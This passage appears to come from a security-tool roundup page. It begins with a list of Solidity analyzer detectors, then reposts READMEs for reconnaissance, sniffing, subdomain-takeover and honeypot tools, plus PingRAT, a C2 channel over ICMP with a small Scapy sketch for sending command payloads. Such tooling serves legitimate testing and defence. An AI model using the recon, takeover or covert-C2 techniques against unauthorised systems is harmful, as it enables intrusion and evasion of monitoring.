    3 array-by-reference Modifying storage array by value High High
    4 encode-packed-collision ABI encodePacked Collision High High
    5 incorrect-shift The order of parameters in a shift instruction is incorrect. High High
    6 multiple-constructors Multiple constructor schemes High High
    7 name-reused Contract's name reused High High
    8 protected-vars Detected unprotected variables High High
    9 public-mappings-nested Public mappings with nested variables High High
    10 rtlo Right-To-Left-Override control character is used High High
    11 shadowing-state State variables shadowing High High
    12 suicidal Functions allowing anyone to destruct the contract High High
    13 uninitialized-state Uninitialized state variables High High
    14 uninitialized-storage Uninitialized storage variables High High
    15 unprotected-upgrade Unprotected upgradeable contract High High
    16 codex Use Codex to find vulnerabilities. High Low
    17 arbitrary-send-erc20-permit transferFrom uses arbitrary from with permit High Medium
    18 arbitrary-send-eth Functions that send Ether to arbitrary destinations High Medium
    19 controlled-array-length Tainted array length assignment High Medium
    20 controlled-delegatecall Controlled delegatecall destination High Medium
    21 delegatecall-loop Payable functions using delegatecall inside a loop High Medium
    22 incorrect-exp Incorrect exponentiation High Medium
    23 incorrect-return If a return is incorrectly used in assembly mode. High Medium
    24 msg-value-loop msg.value inside a loop High Medium
    25 reentrancy-eth Reentrancy vulnerabilities (theft of ethers) High Medium
    26 return-leave If a return is used instead of a leave. High Medium
    27 storage-array Signed storage integer array compiler bug High Medium
    28 unchecked-transfer Unchecked tokens transfer High Medium
    29 weak-prng Weak PRNG High Medium
    30 domain-separator-collision Detects ERC20 tokens that have a function whose signature collides with EIP-2612's DOMAIN_SEPARATOR() Medium High
    31 enum-conversion Detect dangerous enum conversion Medium High
    32 erc20-interface Incorrect ERC20 interfaces Medium High
    33 erc721-interface Incorrect ERC721 interfaces Medium High
    34 incorrect-equality Dangerous strict equalities Medium High
    35 locked-ether Contracts that lock ether Medium High
    36 mapping-deletion Deletion on mapping containing a structure Medium High
    37 shadowing-abstract State variables shadowing from abstract contracts Medium High
    38 tautological-compare Comparing a variable to itself always returns true or false, depending on comparison Medium High
    39 tautology Tautology or contradiction Medium High
    40 write-after-write Unused write Medium High
    41 boolean-cst Misuse of Boolean constant Medium Medium
    42 constant-function-asm Constant functions using assembly code Medium Medium
    43 constant-function-state Constant functions changing the state Medium Medium
    44 divide-before-multiply Imprecise arithmetic operations order Medium Medium
    45 out-of-order-retryable Out-of-order retryable transactions Medium Medium
    46 reentrancy-no-eth Reentrancy vulnerabilities (no theft of ethers) Medium Medium
    47 reused-constructor Reused base constructor Medium Medium
    48 tx-origin Dangerous usage of tx.origin Medium Medium
    49 unchecked-lowlevel Unchecked low-level calls Medium Medium
    50 unchecked-send Unchecked send Medium Medium
    51 uninitialized-local Uninitialized local variables Medium Medium
    52 unused-return Unused return values Medium Medium
    53 incorrect-modifier Modifiers that can return the default value Low High
    54 shadowing-builtin Built-in symbol shadowing Low High
    55 shadowing-local Local variables shadowing Low High
    56 uninitialized-fptr-cst Uninitialized function pointer calls in constructors Low High
    57 variable-scope Local variables used prior their declaration Low High
    58 void-cst Constructor called not implemented Low High
    59 calls-loop Multiple calls in a loop Low Medium
    60 events-access Missing Events Access Control Low Medium
    61 events-maths Missing Events Arithmetic Low Medium
    62 incorrect-unary Dangerous unary expressions Low Medium
    63 missing-zero-check Missing Zero Address Validation Low Medium
    64 reentrancy-benign Benign reentrancy vulnerabilities Low Medium
    65 reentrancy-events Reentrancy vulnerabilities leading to out-of-order Events Low Medium
    66 return-bomb A low level callee may consume all callers gas unexpectedly. Low Medium
    67 timestamp Dangerous usage of block.timestamp Low Medium
    68 assembly Assembly usage Informational High
    69 assert-state-change Assert state change Informational High
    70 boolean-equal Comparison to boolean constant Informational High
    71 cyclomatic-complexity Detects functions with high (> 11) cyclomatic complexity Informational High
    72 deprecated-standards Deprecated Solidity Standards Informational High
    73 erc20-indexed Un-indexed ERC20 event parameters Informational High
    74 function-init-state Function initializing state variables Informational High
    75 incorrect-using-for Detects using-for statement usage when no function from a given library matches a given type Informational High
    76 low-level-calls Low level calls Informational High
    77 missing-inheritance Missing inheritance Informational High
    78 naming-convention Conformity to Solidity naming conventions Informational High
    79 pragma If different pragma directives are used Informational High
    80 redundant-statements Redundant statements Informational High
    81 solc-version Incorrect Solidity version Informational High
    82 unimplemented-functions Unimplemented functions Informational High
    83 unused-import Detects unused imports Informational High
    84 unused-state Unused state variables Informational High
    85 costly-loop Costly operations in a loop Informational Medium
    86 dead-code Functions that are not used Informational Medium
    87 reentrancy-unlimited-gas Reentrancy vulnerabilities through send and transfer Informational Medium
    88 similar-names Variable names are too similar Informational Medium
    89 too-many-digits Conformance to numeric notation best practices Informational Medium
    90 cache-array-length Detects for loops that use length member of some storage array in their loop condition and don't modify it. Optimization High
    91 constable-states State variables that could be declared constant Optimization High
    92 external-function Public function that could be declared external Optimization High
    93 immutable-states State variables that could be declared immutable Optimization High
    94 var-read-using-this Contract reads its own variable using this Optimization High


    Domainim - A Fast And Comprehensive Tool For Organizational Network Scanning

    By: Zion3R


    Domainim is a fast domain reconnaissance tool for organizational network scanning. The tool aims to provide a brief overview of an organization's structure using techniques like OSINT, bruteforcing, DNS resolving, etc.


    Features

    Current features (v1.0.1):

    • Subdomain enumeration (2 engines + bruteforcing)
    • User-friendly output
    • Resolving A records (IPv4)
    • Virtual hostname enumeration
    • Reverse DNS lookup
    • Detects wildcard subdomains (for bruteforcing)
    • Basic TCP port scanning
    • Subdomains are accepted as input
    • Export results to JSON file

    A few features are work in progress. See Planned features for more details.

    The project is inspired by Sublist3r. The port scanner module is heavily based on NimScan.

    Installation

    You can build this repo from source:

    • Clone the repository
    git clone git@github.com:pptx704/domainim
    • Build the binary
    nimble build
    • Run the binary
    ./domainim <domain> [--ports=<ports>]

    Or, you can just download the binary from the release page. Keep in mind that the binary is tested on Debian based systems only.

    Usage

    ./domainim <domain> [--ports=<ports> | -p:<ports>] [--wordlist=<filename> | -l:<filename> [--rps=<int> | -r:<int>]] [--dns=<dns> | -d:<dns>] [--out=<filename> | -o:<filename>]
    • <domain> is the domain to be enumerated. It can be a subdomain as well.
    • --ports | -p is a string specification of the ports to be scanned (see the sketch after this list). It can be one of the following:
    • all - Scan all ports (1-65535)
    • none - Skip port scanning (default)
    • t<n> - Scan top n ports (same as nmap). i.e. t100 scans top 100 ports. Max value is 5000. If n is greater than 5000, it will be set to 5000.
    • single value - Scan a single port. i.e. 80 scans port 80
    • range value - Scan a range of ports. i.e. 80-100 scans ports 80 to 100
    • comma separated values - Scan multiple ports. i.e. 80,443,8080 scans ports 80, 443 and 8080
    • combination - Scan a combination of the above. i.e. 80,443,8080-8090,t500 scans ports 80, 443, 8080 to 8090 and top 500 ports
    • --dns | -d is the address of the DNS server. This should be a valid IPv4 address and can optionally contain the port number:
    • a.b.c.d - Use DNS server at a.b.c.d on port 53
    • a.b.c.d#n - Use DNS server at a.b.c.d on port n
    • --wordlist | -l - Path to the wordlist file. This is used for bruteforcing subdomains. If the file is invalid, bruteforcing will be skipped. You can get a wordlist from SecLists. A wordlist is also provided in the release page.
    • --rps | -r - Number of requests to be made per second during bruteforcing. The default value is 1024 req/s. Note that DNS queries are made in batches, and the next batch starts only after the previous one completes. Since queries can be rate limited, increasing the value does not always guarantee faster results.
    • --out | -o - Path to the output file. The output will be saved in JSON format. The filename must end with .json.
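
    The --ports grammar is easy to model; here is an illustrative Python parser for the specification described above (Domainim itself is written in Nim, and the top-ports list here is a placeholder):

    TOP_PORTS = [80, 443, 22, 21, 25, 3389, 110, 445, 139, 143]  # placeholder list

    def expand_ports(spec: str):
        """Expand a --ports specification into a sorted list of ports, or None."""
        if spec == "none":
            return None                      # skip port scanning (default)
        if spec == "all":
            return list(range(1, 65536))
        ports = set()
        for part in spec.split(","):
            if part.startswith("t"):         # t<n>: top n ports, capped at 5000
                n = min(int(part[1:]), 5000)
                ports.update(TOP_PORTS[:n])
            elif "-" in part:                # range, e.g. 8080-8090
                lo, hi = part.split("-")
                ports.update(range(int(lo), int(hi) + 1))
            else:                            # single value, e.g. 80
                ports.add(int(part))
        return sorted(ports)

    print(expand_ports("80,443,8080-8090,t500"))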

    Examples:
    • ./domainim nmap.org --ports=all
    • ./domainim google.com --ports=none --dns=8.8.8.8#53
    • ./domainim pptx704.com --ports=t100 --wordlist=wordlist.txt --rps=1500
    • ./domainim pptx704.com --ports=t100 --wordlist=wordlist.txt --out=results.json
    • ./domainim mysite.com --ports=t50,5432,7000-9000 --dns=1.1.1.1

    The help menu can be accessed using ./domainim --help or ./domainim -h.

    Usage:
    domainim <domain> [--ports=<ports> | -p:<ports>] [--wordlist=<filename> | -l:<filename> [--rps=<int> | -r:<int>]] [--dns=<dns> | -d:<dns>] [--out=<filename> | -o:<filename>]
    domainim (-h | --help)

    Options:
    -h, --help Show this screen.
    -p, --ports Ports to scan. [default: `none`]
    Can be `all`, `none`, `t<n>`, single value, range value, combination
    -l, --wordlist Wordlist for subdomain bruteforcing. Bruteforcing is skipped for invalid file.
    -d, --dns IP and Port for DNS Resolver. Should be a valid IPv4 with an optional port [default: system default]
    -r, --rps DNS queries to be made per second [default: 1024 req/s]
    -o, --out JSON file where the output will be saved. Filename must end with `.json`

    Examples:
    domainim domainim.com -p:t500 -l:wordlist.txt --dns=1.1.1.1#53 --out=results.json
    domainim sub.domainim.com --ports=all --dns=8.8.8.8 -r:1500 -o:results.json

    The JSON schema for the results is as follows:

    [
        {
            "subdomain": string,
            "data": [
                {
                    "ipv4": string,
                    "vhosts": [string],
                    "reverse_dns": string,
                    "ports": [int]
                }
            ]
        }
    ]

    Example json for nmap.org can be found here.
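
    A short sketch of consuming that schema, assuming a file produced with --out=results.json and the object layout shown above:

    import json

    with open("results.json") as f:
        results = json.load(f)

    for entry in results:
        for record in entry["data"]:
            print(entry["subdomain"], record["ipv4"], record["ports"])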

    Contributing

    Contributions are welcome. Feel free to open a pull request or an issue.

    Planned Features

    • [x] TCP port scanning
    • [ ] UDP port scanning support
    • [ ] Resolve AAAA records (IPv6)
    • [x] Custom DNS server
    • [x] Add bruteforcing subdomains using a wordlist
    • [ ] Force bruteforcing (even if wildcard subdomain is found)
    • [ ] Add more engines for subdomain enumeration
    • [x] File output (JSON)
    • [ ] Multiple domain enumeration
    • [ ] Dir and File busting

    Others

    • [x] Update verbose output when encountering errors (v0.2.0)
    • [x] Show progress bar for longer operations
    • [ ] Add individual port scan progress bar
    • [ ] Add tests
    • [ ] Add comments and docstrings

    Additional Notes

    This project is still in its early stages. There are several limitations I am aware of.

    The two engines I am using (I call them engines because Sublist3r does so) currently have some sort of response limit. dnsdumpster can fetch up to 100 subdomains. crt.sh also randomizes the results when there are too many. Another issue with crt.sh is that it sometimes returns an SQL error, so for some domains, results can differ between runs. I am planning to add more engines in the future (at least a brute force engine).

    The port scanner only uses the ping response time plus a 750ms timeout. This might lead to false negatives. Since domainim is not meant for port scanning but to provide a quick overview, such cases are acceptable. However, I am planning to add a flag to increase the timeout. For the same reason, filtered ports are not shown. For more comprehensive port scanning, I recommend using Nmap. Domainim also doesn't bypass rate limiting (if there is any).

    It might seem that the way vhostnames are printed just brings repetition to the table.


    Printing them as follows might have been better:

    ack.nmap.org, issues.nmap.org, nmap.org, research.nmap.org, scanme.nmap.org, svn.nmap.org, www.nmap.org
    ↳ 45.33.49.119
    ↳ Reverse DNS: ack.nmap.org.

    But previously, while testing, I found cases where not all IPs are shared by the same set of vhostnames. That is why I decided to keep it this way.


    The DNS server might have some sort of rate limiting. That's why I added random delays (between 0-300ms) for IPv4 resolving per query, so the DNS server doesn't get all the queries at once but rather in a more natural way. For the bruteforcing method, the value is between 0-1000ms by default, but that can be changed using the --rps | -r flag.

    One particular limitation that is bugging me is that the DNS resolver does not return all the IPs for a domain, so it is necessary to make multiple queries to get all (or most) of them. But then again, it is not possible to know how many IPs there are for a domain. I still have to come up with a solution for this. Also, nim-ndns doesn't support CNAME records, so if a domain has a CNAME record, it will not be resolved. I am waiting for a response from the author on this.

    For now, bruteforcing is skipped if a possible wildcard subdomain is found. This is because, if a domain has a wildcard subdomain, bruteforcing will resolve an IPv4 for every candidate subdomain. However, this also skips valid subdomains (i.e. scanme.nmap.org would be skipped even though it's not a wildcard value). I will add a --force-brute | -fb flag later to force bruteforcing.

    A similar thing is true for vhost enumeration with subdomain inputs. Since URLs that end with the given subdomain are returned, subdomains of sibling domains are not considered. For example, scanme.nmap.org will not be printed for ack.nmap.org, but something.ack.nmap.org might be. I could search for all subdomains of nmap.org, but that defeats the purpose of having a subdomain as input.

    License

    MIT License. See LICENSE for full text.



    Above - Invisible Network Protocol Sniffer

    By: Zion3R


    Invisible protocol sniffer for finding vulnerabilities in the network. Designed for pentesters and security engineers.


    Above: Invisible network protocol sniffer
    Designed for pentesters and security engineers

    Author: Magama Bazarov, <caster@exploit.org>
    Pseudonym: Caster
    Version: 2.6
    Codename: Introvert

    Disclaimer

    All information contained in this repository is provided for educational and research purposes only. The author is not responsible for any illegal use of this tool.

    It is a specialized network security tool that helps both pentesters and security professionals.

    Mechanics

    Above is an invisible network sniffer for finding vulnerabilities in network equipment. It is based entirely on network traffic analysis, so it makes no noise on the air; it is invisible. It is built entirely on the Scapy library.

    Above allows pentesters to automate the process of finding vulnerabilities in network hardware: discovery protocols, dynamic routing, 802.1Q, ICS protocols, FHRP, STP, LLMNR/NBT-NS, etc.

    Supported protocols

    Detects up to 27 protocols:

    MACSec (802.1X AE)
    EAPOL (Checking 802.1X versions)
    ARP (Passive ARP, Host Discovery)
    CDP (Cisco Discovery Protocol)
    DTP (Dynamic Trunking Protocol)
    LLDP (Link Layer Discovery Protocol)
    802.1Q Tags (VLAN)
    S7COMM (Siemens)
    OMRON
    TACACS+ (Terminal Access Controller Access Control System Plus)
    ModbusTCP
    STP (Spanning Tree Protocol)
    OSPF (Open Shortest Path First)
    EIGRP (Enhanced Interior Gateway Routing Protocol)
    BGP (Border Gateway Protocol)
    VRRP (Virtual Router Redundancy Protocol)
    HSRP (Hot Standby Router Protocol)
    GLBP (Gateway Load Balancing Protocol)
    IGMP (Internet Group Management Protocol)
    LLMNR (Link Local Multicast Name Resolution)
    NBT-NS (NetBIOS Name Service)
    MDNS (Multicast DNS)
    DHCP (Dynamic Host Configuration Protocol)
    DHCPv6 (Dynamic Host Configuration Protocol v6)
    ICMPv6 (Internet Control Message Protocol v6)
    SSDP (Simple Service Discovery Protocol)
    MNDP (MikroTik Neighbor Discovery Protocol)

    Operating Mechanism

    Above works in two modes:

    • Hot mode: Sniffing on your interface specifying a timer
    • Cold mode: Analyzing traffic dumps

    The tool is very simple in its operation and is driven by arguments:

    • Interface: Specifying the network interface on which sniffing will be performed
    • Timer: Time during which traffic analysis will be performed
    • Input: The tool takes an already prepared .pcap as input and looks for protocols in it
    • Output: Above will record the listened traffic to .pcap file, its name you specify yourself
    • Passive ARP: Detecting hosts in a segment using Passive ARP

    usage: above.py [-h] [--interface INTERFACE] [--timer TIMER] [--output OUTPUT] [--input INPUT] [--passive-arp]

    options:
    -h, --help show this help message and exit
    --interface INTERFACE
    Interface for traffic listening
    --timer TIMER Time in seconds to capture packets, if not set capture runs indefinitely
    --output OUTPUT File name where the traffic will be recorded
    --input INPUT File name of the traffic dump
    --passive-arp Passive ARP (Host Discovery)

    Information about protocols

    The information obtained will be useful not only to the pentester but also to the security engineer, who will know what needs attention.

    When Above detects a protocol, it outputs the necessary information to indicate the attack vector or security issue:

    • Impact: What kind of attack can be performed on this protocol;

    • Tools: What tool can be used to launch an attack;

    • Technical information: Required information for the pentester, sender MAC/IP addresses, FHRP group IDs, OSPF/EIGRP domains, etc.

    • Mitigation: Recommendations for fixing the security problems

    • Source/Destination Addresses: For each protocol, Above displays information about the source and destination MAC and IP addresses


    Installation

    Linux

    You can install Above directly from the Kali Linux repositories

    caster@kali:~$ sudo apt update && sudo apt install above

    Or...

    caster@kali:~$ sudo apt-get install python3-scapy python3-colorama python3-setuptools
    caster@kali:~$ git clone https://github.com/casterbyte/Above
    caster@kali:~$ cd Above/
    caster@kali:~/Above$ sudo python3 setup.py install

    macOS:

    # Install python3 first
    brew install python3
    # Then install required dependencies
    sudo pip3 install scapy colorama setuptools

    # Clone the repo
    git clone https://github.com/casterbyte/Above
    cd Above/
    sudo python3 setup.py install

    Don't forget to deactivate your firewall on macOS!

    Settings > Network > Firewall


    How to Use

    Hot mode

    Above requires root access for sniffing

    Above can be run with or without a timer:

    caster@kali:~$ sudo above --interface eth0 --timer 120

    To stop traffic sniffing, press CTRL + C

    WARNING! Above is not designed to work with tunnel interfaces (L3) due to the use of filters for L2 protocols. The tool may not work properly on tunneled L3 interfaces.

    Example:

    caster@kali:~$ sudo above --interface eth0 --timer 120

    -----------------------------------------------------------------------------------------
    [+] Start sniffing...

    [*] After the protocol is detected - all necessary information about it will be displayed
    --------------------------------------------------
    [+] Detected SSDP Packet
    [*] Attack Impact: Potential for UPnP Device Exploitation
    [*] Tools: evil-ssdp
    [*] SSDP Source IP: 192.168.0.251
    [*] SSDP Source MAC: 02:10:de:64:f2:34
    [*] Mitigation: Ensure UPnP is disabled on all devices unless absolutely necessary, monitor UPnP traffic
    --------------------------------------------------
    [+] Detected MDNS Packet
    [*] Attack Impact: MDNS Spoofing, Credentials Interception
    [*] Tools: Responder
    [*] MDNS Spoofing works specifically against Windows machines
    [*] You cannot get NetNTLMv2-SSP from Apple devices
    [*] MDNS Speaker IP: fe80::183f:301c:27bd:543
    [*] MDNS Speaker MAC: 02:10:de:64:f2:34
    [*] Mitigation: Filter MDNS traffic. Be careful with MDNS filtering
    --------------------------------------------------

    If you need to record the sniffed traffic, use the --output argument

    caster@kali:~$ sudo above --interface eth0 --timer 120 --output above.pcap

    If you interrupt the tool with CTRL+C, the traffic is still written to the file

    Cold mode

    If you already have some recorded traffic, you can use the --input argument to look for potential security issues

    caster@kali:~$ above --input ospf-md5.cap

    Example:

    caster@kali:~$ sudo above --input ospf-md5.cap

    [+] Analyzing pcap file...

    --------------------------------------------------
    [+] Detected OSPF Packet
    [+] Attack Impact: Subnets Discovery, Blackhole, Evil Twin
    [*] Tools: Loki, Scapy, FRRouting
    [*] OSPF Area ID: 0.0.0.0
    [*] OSPF Neighbor IP: 10.0.0.1
    [*] OSPF Neighbor MAC: 00:0c:29:dd:4c:54
    [!] Authentication: MD5
    [*] Tools for bruteforce: Ettercap, John the Ripper
    [*] OSPF Key ID: 1
    [*] Mitigation: Enable passive interfaces, use authentication
    --------------------------------------------------
    [+] Detected OSPF Packet
    [+] Attack Impact: Subnets Discovery, Blackhole, Evil Twin
    [*] Tools: Loki, Scapy, FRRouting
    [*] OSPF Area ID: 0.0.0.0
    [*] OSPF Neighbor IP: 192.168.0.2
    [*] OSPF Neighbor MAC: 00:0c:29:43:7b:fb
    [!] Authentication: MD5
    [*] Tools for bruteforce: Ettercap, John the Ripper
    [*] OSPF Key ID: 1
    [*] Mitigation: Enable passive interfaces, use authentication

    Passive ARP

The tool can detect hosts without generating any noise on the network by processing ARP frames in passive mode

    caster@kali:~$ sudo above --interface eth0 --passive-arp --timer 10

    [+] Host discovery using Passive ARP

    --------------------------------------------------
    [+] Detected ARP Reply
    [*] ARP Reply for IP: 192.168.1.88
    [*] MAC Address: 00:00:0c:07:ac:c8
    --------------------------------------------------
    [+] Detected ARP Reply
    [*] ARP Reply for IP: 192.168.1.40
    [*] MAC Address: 00:0c:29:c5:82:81
    --------------------------------------------------
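For illustration, the passive-ARP idea fits in a few lines of Scapy (which Above already depends on): listen for ARP replies and log the advertised IP/MAC pairs without transmitting a single frame. This is a minimal sketch of the concept, not Above's actual implementation; the interface name eth0 is an assumption.

from scapy.all import sniff, ARP  # Above itself is built on scapy

def handle_arp(pkt):
    # op == 2 marks an ARP reply ("is-at"); log the advertised IP/MAC pair
    if pkt.haslayer(ARP) and pkt[ARP].op == 2:
        print(f"[+] ARP Reply for IP: {pkt[ARP].psrc}  MAC: {pkt[ARP].hwsrc}")

# Root is required; store=0 avoids keeping packets in memory,
# and the BPF filter restricts capture to ARP traffic only
sniff(iface="eth0", filter="arp", prn=handle_arp, store=0)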

    Outro

    I wrote this tool because of the track "A View From Above (Remix)" by KOAN Sound. This track was everything to me when I was working on this sniffer.




    Subhunter - A Fast Subdomain Takeover Tool

    By: Zion3R


Subdomain takeover is a common vulnerability that allows an attacker to gain control over a subdomain of a target domain and redirect users intended for an organization's domain to a website that performs malicious activities, such as phishing campaigns, stealing user cookies, etc. Typically, this happens when the subdomain has a CNAME record in DNS, but no host is providing content for it. Subhunter takes a given list of subdomains and scans them to check for this vulnerability.
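At its core, the check works like this: resolve the subdomain's CNAME, see whether it points at a known third-party service, and look for that service's "unclaimed" fingerprint in the HTTP response. Below is a minimal Python sketch of the idea (Subhunter itself is written in Go and uses can-i-take-over-xyz fingerprint data; the two-entry table here is illustrative only, and dnspython plus requests are assumed to be installed):

import dns.resolver
import requests

# Illustrative mini fingerprint table, not the real data set
FINGERPRINTS = {
    "github.io": "There isn't a GitHub Pages site here",
    "s3.amazonaws.com": "NoSuchBucket",
}

def check_takeover(subdomain: str) -> bool:
    try:
        cname = dns.resolver.resolve(subdomain, "CNAME")[0].target.to_text()
    except Exception:
        return False  # no CNAME record, nothing dangling to claim
    for service, marker in FINGERPRINTS.items():
        if service in cname and marker in requests.get(f"http://{subdomain}", timeout=10).text:
            print(f"[+] Possible takeover found at {subdomain} -> {cname}")
            return True
    return False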


    Features:

    • Auto update
    • Uses random user agents
    • Built in Go
    • Uses a fork of fingerprint data from well known sources (can-i-take-over-xyz)

    Installation:

    Option 1:

    Download from releases

    Option 2:

    Build from source:

    $ git clone https://github.com/Nemesis0U/Subhunter.git
    $ go build subhunter.go

    Usage:

    Options:

    Usage of subhunter:
    -l string
    File including a list of hosts to scan
    -o string
    File to save results
    -t int
    Number of threads for scanning (default 50)
    -timeout int
    Timeout in seconds (default 20)

    Demo (Added fake fingerprint for POC):

    ./Subhunter -l subdomains.txt -o test.txt

    ____ _ _ _
    / ___| _ _ | |__ | |__ _ _ _ __ | |_ ___ _ __
    \___ \ | | | | | '_ \ | '_ \ | | | | | '_ \ | __| / _ \ | '__|
    ___) | | |_| | | |_) | | | | | | |_| | | | | | | |_ | __/ | |
    |____/ \__,_| |_.__/ |_| |_| \__,_| |_| |_| \__| \___| |_|


    A fast subdomain takeover tool

    Created by Nemesis

    Loaded 88 fingerprints for current scan

    -----------------------------------------------------------------------------

    [+] Nothing found at www.ubereats.com: Not Vulnerable
    [+] Nothing found at testauth.ubereats.com: Not Vulnerable
    [+] Nothing found at apple-maps-app-clip.ubereats.com: Not Vulnerable
    [+] Nothing found at about.ubereats.com: Not Vulnerable
    [+] Nothing found at beta.ubereats.com: Not Vulnerable
    [+] Nothing found at ewp.ubereats.com: Not Vulnerable
[+] Nothing found at edgetest.ubereats.com: Not Vulnerable
    [+] Nothing found at guest.ubereats.com: Not Vulnerable
    [+] Google Cloud: Possible takeover found at testauth.ubereats.com: Vulnerable
    [+] Nothing found at info.ubereats.com: Not Vulnerable
    [+] Nothing found at learn.ubereats.com: Not Vulnerable
    [+] Nothing found at merchants.ubereats.com: Not Vulnerable
    [+] Nothing found at guest-beta.ubereats.com: Not Vulnerable
    [+] Nothing found at merchant-help.ubereats.com: Not Vulnerable
    [+] Nothing found at merchants-beta.ubereats.com: Not Vulnerable
    [+] Nothing found at merchants-staging.ubereats.com: Not Vulnerable
    [+] Nothing found at messages.ubereats.com: Not Vulnerable
    [+] Nothing found at order.ubereats.com: Not Vulnerable
    [+] Nothing found at restaurants.ubereats.com: Not Vulnerable
    [+] Nothing found at payments.ubereats.com: Not Vulnerable
    [+] Nothing found at static.ubereats.com: Not Vulnerable

    Subhunter exiting...
    Results written to test.txt




    PingRAT - Secretly Passes C2 Traffic Through Firewalls Using ICMP Payloads

    By: Zion3R


    PingRAT secretly passes C2 traffic through firewalls using ICMP payloads.

    Features:

    • Uses ICMP for Command and Control
    • Undetectable by most AV/EDR solutions
    • Written in Go

    Installation:

    Download the binaries

    or build the binaries and you are ready to go:

    $ git clone https://github.com/Nemesis0U/PingRAT.git
    $ go build client.go
    $ go build server.go

    Usage:

    Server:

    ./server -h
    Usage of ./server:
    -d string
    Destination IP address
    -i string
    Listener (virtual) Network Interface (e.g. eth0)

    Client:

    ./client -h
    Usage of ./client:
    -d string
    Destination IP address
    -i string
    (Virtual) Network Interface (e.g., eth0)
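PingRAT's binaries are Go, but the underlying trick is easy to demonstrate: commands and results simply ride inside the data field of ICMP echo packets, which many firewalls forward untouched. A hedged Python/Scapy sketch of the client side of that idea (not PingRAT's actual wire protocol; the destination address is a placeholder and root privileges are required):

from scapy.all import IP, ICMP, Raw, sr1

def icmp_exchange(dst: str, data: bytes) -> bytes:
    # C2 data travels in the echo-request payload; a cooperating
    # listener answers with its own payload in the echo reply
    reply = sr1(IP(dst=dst)/ICMP(type=8)/Raw(load=data), timeout=5, verbose=0)
    return bytes(reply[Raw].load) if reply and reply.haslayer(Raw) else b""

# Example against a hypothetical listener:
# print(icmp_exchange("192.0.2.10", b"whoami"))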



    Galah - An LLM-powered Web Honeypot Using The OpenAI API

    By: Zion3R


    TL;DR: Galah (/Ι‘Ι™Λˆlɑː/ - pronounced 'guh-laa') is an LLM (Large Language Model) powered web honeypot, currently compatible with the OpenAI API, that is able to mimic various applications and dynamically respond to arbitrary HTTP requests.


    Description

    Named after the clever Australian parrot known for its mimicry, Galah mirrors this trait in its functionality. Unlike traditional web honeypots that rely on a manual and limiting method of emulating numerous web applications or vulnerabilities, Galah adopts a novel approach. This LLM-powered honeypot mimics various web applications by dynamically crafting relevant (and occasionally foolish) responses, including HTTP headers and body content, to arbitrary HTTP requests. Fun fact: in Aussie English, Galah also means fool!

    I've deployed a cache for the LLM-generated responses (the cache duration can be customized in the config file) to avoid generating multiple responses for the same request and to reduce the cost of the OpenAI API. The cache stores responses per port, meaning if you probe a specific port of the honeypot, the generated response won't be returned for the same request on a different port.

    The prompt is the most crucial part of this honeypot! You can update the prompt in the config file, but be sure not to change the part that instructs the LLM to generate the response in the specified JSON format.
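For a concrete picture of that JSON contract, here is a minimal Python sketch that turns such an LLM reply into a raw HTTP response. Galah itself is written in Go; the sample object mirrors the log records shown later (note that the status line travels inside the Headers map), and build_response is a hypothetical helper name:

import json

# Sample LLM output following the JSON shape seen in Galah's logs
llm_output = '{"Headers": {"Content-Type": "text/plain", "Server": "Apache/2.4.41 (Ubuntu)", "Status": "403 Forbidden"}, "Body": "Forbidden"}'

def build_response(raw: str) -> str:
    msg = json.loads(raw)
    headers = dict(msg["Headers"])
    status = headers.pop("Status", "200 OK")  # the status line rides inside Headers
    lines = [f"HTTP/1.1 {status}"] + [f"{k}: {v}" for k, v in headers.items()]
    return "\r\n".join(lines) + "\r\n\r\n" + msg["Body"]

print(build_response(llm_output))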

Note: Galah was a fun weekend project I created to evaluate the capabilities of LLMs in generating HTTP messages, and it is not intended for production use. The honeypot may be fingerprinted based on its response time, non-standard or sometimes weird responses, and other network-based techniques. Use this tool at your own risk, and be sure to set usage limits for your OpenAI API.

    Future Enhancements

    • Rule-Based Response: The new version of Galah will employ a dynamic, rule-based approach, adding more control over response generation. This will further reduce OpenAI API costs and increase the accuracy of the generated responses.

    • Response Database: It will enable you to generate and import a response database. This ensures the honeypot only turns to the OpenAI API for unknown or new requests. I'm also working on cleaning up and sharing my own database.

    • Support for Other LLMs.

    Getting Started

    • Ensure you have Go version 1.20+ installed.
    • Create an OpenAI API key from here.
    • If you want to serve over HTTPS, generate TLS certificates.
    • Clone the repo and install the dependencies.
    • Update the config.yaml file.
    • Build and run the Go binary!
    % git clone git@github.com:0x4D31/galah.git
    % cd galah
    % go mod download
    % go build
    % ./galah -i en0 -v

    β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ
    β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ
    β–ˆβ–ˆ β–ˆβ–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ
    β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ
    β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ
    llm-based web honeypot // version 1.0
    author: Adel "0x4D31" Karimi

    2024/01/01 04:29:10 Starting HTTP server on port 8080
    2024/01/01 04:29:10 Starting HTTP server on port 8888
    2024/01/01 04:29:10 Starting HTTPS server on port 8443 with TLS profile: profile1_selfsigned
    2024/01/01 04:29:10 Starting HTTPS server on port 443 with TLS profile: profile1_selfsigned

    2024/01/01 04:35:57 Received a request for "/.git/config" from [::1]:65434
    2024/01/01 04:35:57 Request cache miss for "/.git/config": Not found in cache
    2024/01/01 04:35:59 Generated HTTP response: {"Headers": {"Content-Type": "text/plain", "Server": "Apache/2.4.41 (Ubuntu)", "Status": "403 Forbidden"}, "Body": "Forbidden\nYou don't have permission to access this resource."}
    2024/01/01 04:35:59 Sending the crafted response to [::1]:65434

